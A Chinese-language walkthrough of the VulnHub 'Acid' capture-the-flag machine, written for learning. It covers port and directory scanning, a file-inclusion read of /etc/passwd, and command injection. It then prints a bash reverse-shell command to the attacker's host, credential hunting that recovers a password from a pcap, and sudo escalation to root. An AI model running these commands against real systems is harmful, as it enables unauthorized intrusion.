CTF|【VulnHub】Acid靶场复盘 linux|web安全|安全

0x01 环境搭建 1、靶机下载地址
2、攻击机kali地址192.168.199.134
0x02 靶机发现将攻击机和靶机的网络模式都设置为nat模式，用nmap -sn发现主机，关闭靶机，再扫一遍，其中少的主机为靶机ip。
0x03 信息收集 1、端口扫描，发现33447端口

┌──(rootkali)-[~] └─# nmap -p- 192.168.199.128 Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 20:42 EST Nmap scan report for 192.168.199.128 Host is up (0.00044s latency). Not shown: 65534 closed ports PORTSTATE SERVICE 33447/tcp openunknown MAC Address: 00:0C:29:BB:65:29 (VMware)Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

web访问33447端口

文章图片

2、网页扫描（1）使用big.txt字典扫描，发现images目录和其下数据库文件Thumbs.db，无果。

┌──(rootkali)-[~] └─# dirb http://192.168.199.128:33447 /usr/share/wordlists/dirb/big.txt255 ?----------------- DIRB v2.22 By The Dark Raver -----------------START_TIME: Thu Mar3 20:48:26 2022 URL_BASE: http://192.168.199.128:33447/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt-----------------GENERATED WORDS: 20458---- Scanning URL: http://192.168.199.128:33447/ ---- ==> DIRECTORY: http://192.168.199.128:33447/css/ ==> DIRECTORY: http://192.168.199.128:33447/images/ + http://192.168.199.128:33447/server-status (CODE:403|SIZE:306)---- Entering directory: http://192.168.199.128:33447/css/ -------- Entering directory: http://192.168.199.128:33447/images/ ---- + http://192.168.199.128:33447/images/Thumbs.db (CODE:200|SIZE:31744)----------------- END_TIME: Thu Mar3 20:49:00 2022 DOWNLOADED: 61374 - FOUND: 2

（2）继续查看网页源码，发现提示字符串，0x643239334c6d70775a773d3d

文章图片

使用decoder两次解密得到wow.jpg

文章图片

常规思路，我们会怀疑图片中存在隐写信息，使用cat命令发现图片末尾有16进制数字

文章图片

将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码，得到
7aee0f6d588ed9905ee37f16a7c610d4，这是一串md5。去cmd5解密，得到63425，推测是一个密码或者ID。至此发现wow.jpg可能是出题者留下的一个坑，此处需要果断放弃，看其他条件。
（3）再返回看主页，发现title标签处有提示，发现新目录，这也是CTF常见提示套路。

文章图片

文章图片

（4）扫描/Challenge目录，发现子目录及PHP页面

┌──(root??kali)-[~] └─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt----------------- DIRB v2.22 By The Dark Raver -----------------START_TIME: Thu Mar3 22:03:29 2022 URL_BASE: http://192.168.199.128:33447/Challenge/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt-----------------GENERATED WORDS: 20458---- Scanning URL: http://192.168.199.128:33447/Challenge/ ---- ==> DIRECTORY: http://192.168.199.128:33447/Challenge/css/ ==> DIRECTORY: http://192.168.199.128:33447/Challenge/includes/ ==> DIRECTORY: http://192.168.199.128:33447/Challenge/js/ ==> DIRECTORY: http://192.168.199.128:33447/Challenge/styles/---- Entering directory: http://192.168.199.128:33447/Challenge/css/ -------- Entering directory: http://192.168.199.128:33447/Challenge/includes/ -------- Entering directory: http://192.168.199.128:33447/Challenge/js/ -------- Entering directory: http://192.168.199.128:33447/Challenge/styles/ --------------------- END_TIME: Thu Mar3 22:04:23 2022 DOWNLOADED: 102290 - FOUND: 0

提交任意参数，观察页面为php页面

文章图片

（5）使用-X参数扫描，发现cake.php、error.php、include.php、index.php页面

┌──(root??kali)-[~] └─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php----------------- DIRB v2.22 By The Dark Raver -----------------START_TIME: Thu Mar3 22:09:32 2022 URL_BASE: http://192.168.199.128:33447/Challenge/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]-----------------GENERATED WORDS: 20458---- Scanning URL: http://192.168.199.128:33447/Challenge/ ---- + http://192.168.199.128:33447/Challenge/cake.php (CODE:200|SIZE:496) + http://192.168.199.128:33447/Challenge/error.php (CODE:200|SIZE:309) + http://192.168.199.128:33447/Challenge/include.php (CODE:302|SIZE:0) + http://192.168.199.128:33447/Challenge/index.php (CODE:200|SIZE:1333)

（6）访问include.php页面，发生302跳转

文章图片

进入login页面，随便输入用户名密码，获得cookie，再访问include.php页面

文章图片

上burpsuite发现文件包含漏洞，实现可读文件/etc/passwd

文章图片

（7）由于没有上传点，再次访问cake.php，发现下级目录/Magic_Box

文章图片

（8）继续-X参数扫描，发现low.php和command.php，command.php中有命令执行漏洞

文章图片

0x03 漏洞利用使用通过URL编码的命令进行bash反弹

bash -c 'bash -i >& /dev/tcp/192.168.199.134/6666 0>&1'

文章图片

文章图片

得到反弹shell

文章图片

0x04 权限提升 1、python导入交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

2、进入/tmp目录，发现wget、gcc命令不存在，猜测题意非溢出提权，需要查找密码

┌──(rootkali)-[~] └─# nc -lvp 66661 ? listening on [any] 6666 ... 192.168.199.128: inverse host lookup failed: Unknown host connect to [192.168.199.134] from (UNKNOWN) [192.168.199.128] 33055 bash: cannot set terminal process group (1430): Inappropriate ioctl for device bash: no job control in this shell www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /tmp cd /tmp www-data@acid:/tmp$ wget wget The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget' www-data@acid:/tmp$ gcc gcc The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc' www-data@acid:/tmp$

3、查看用户有两个acid和saman

www-data@acid:/tmp$ ls /home ls /home acid saman www-data@acid:/tmp$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:110::/home/syslog:/bin/false messagebus:x:105:112::/var/run/dbus:/bin/false uuidd:x:106:113::/run/uuidd:/bin/false dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false ntp:x:108:117::/home/ntp:/bin/false whoopsie:x:109:118::/nonexistent:/bin/false acid:x:1000:1000:acid,,,:/home/acid:/bin/bash mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false saman:x:1001:1001:,,,:/home/saman:/bin/bash www-data@acid:/tmp$

4、查看用户文件这类提权题目一般是通过文件中查找普通用户密码，进而通过sudo或者suid提权，因此查找用户文件这条命令必不可少需要记忆并熟练使用

find / -user acid 2>/dev/null

进入到home目录，发现有两个普通用户，acid和saman，查看acid所属文件，发现流量包hint.pcapng

www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /home cd /home www-data@acid:/home$ ls ls acid saman www-data@acid:/home$ find / -user acid 2>/dev/null find / -user acid 2>/dev/null /sbin/raw_vs_isi/hint.pcapng /bin/pwn_me /bin/pwn_me/chkrootkit.lsm /bin/pwn_me/chkrootkit /bin/pwn_me/README.chkwtmp /bin/pwn_me/ACKNOWLEDGMENTS /bin/pwn_me/chkdirs.c /bin/pwn_me/ifpromisc.c /bin/pwn_me/Makefile /bin/pwn_me/chklastlog.c /bin/pwn_me/strings.c /bin/pwn_me/chkwtmp.c /bin/pwn_me/README.chklastlog /bin/pwn_me/COPYRIGHT /bin/pwn_me/chkproc.c /bin/pwn_me/README /bin/pwn_me/chkutmp.c /bin/pwn_me/check_wtmpx.c /var/lib/lightdm-data/acid /var/www/html/Challenge/less /var/www/html/Challenge/less/style.less /var/www/html/Challenge/css /var/www/html/Challenge/css/style.css /var/www/html/Challenge/css/style.css.save /var/www/html/index.html /var/www/html/images /var/www/html/images/bg.jpg /var/www/html/images/Thumbs.db /var/www/html/images/wow.jpg /var/www/html/css /var/www/html/css/style.css /home/acid /home/acid/.xsession-errors.old /home/acid/Public /home/acid/.thumbnails /home/acid/Desktop /home/acid/.mozilla /home/acid/.gconf /home/acid/Videos /home/acid/Templates /home/acid/.config /home/acid/Music /home/acid/.profile /home/acid/.bashrc /home/acid/.sudo_as_admin_successful /home/acid/Downloads /home/acid/.xsession-errors /home/acid/.dmrc /home/acid/.Xauthority /home/acid/.local /home/acid/.local/share /home/acid/.xscreensaver /home/acid/.bash_history /home/acid/.bash_logout /home/acid/.cache /home/acid/.cache/ibus /home/acid/.cache/ibus/bus /home/acid/.cache/ibus/bus/registry /home/acid/.cache/update-manager-core /home/acid/.cache/update-manager-core/meta-release /home/acid/.cache/event-sound-cache.tdb.d08d798c4c9c42baa2b60403184f4c66.i686-pc-linux-gnu /home/acid/.cache/lxpanel-indicator-plugin.log /home/acid/.cache/fontconfig /home/acid/.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le32d4.cache-4 /home/acid/.cache/fontconfig/CACHEDIR.TAG /home/acid/.cache/motd.legal-displayed /home/acid/.cache/vmware /home/acid/.cache/openbox /home/acid/.cache/openbox/openbox.log /home/acid/.cache/openbox/sessions /home/acid/.cache/lxsession /home/acid/.cache/lxsession/Lubuntu /home/acid/.cache/lxsession/Lubuntu/run.log /home/acid/.cache/usb-creator.log /home/acid/.cache/gstreamer-1.0 /home/acid/.cache/gstreamer-1.0/registry.i686.bin /home/acid/.cache/menus /home/acid/.cache/mozilla /home/acid/.dbus /home/acid/Documents /home/acid/.selected_editor /home/acid/Pictures

5、流量包文件分析发现saman密码将流量包cp到web目录，下载到kali，并且打开，过滤data，发现saman的密码1337hax0r

文章图片

6、利用sudo配置不当提权 【CTF|【VulnHub】Acid靶场复盘】python导入pty生成交互式shell，使用su命令切换到saman，发现密码正确。发现sudo配置不当，权限过大，直接提权到root

www-data@acid:/home$ python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/bash")' www-data@acid:/home$ ls ls acidsaman www-data@acid:/home$ su - saman su - saman Password: 1337hax0rsaman@acid:~$ whoami whoami saman saman@acid:~$ sudo -l sudo -l [sudo] password for saman: 1337hax0rMatching Defaults entries for saman on acid: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser saman may run the following commands on acid: (ALL : ALL) ALL saman@acid:~$ sudo su - sudo su - ________ / ___|____ ____ _ _ __ __ _| |_ __| | __ _| |_(_) ____ _____ | |/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __| | |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \ \____\___/|_| |_|\__, |_|\__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/ |___/ root@acid:~#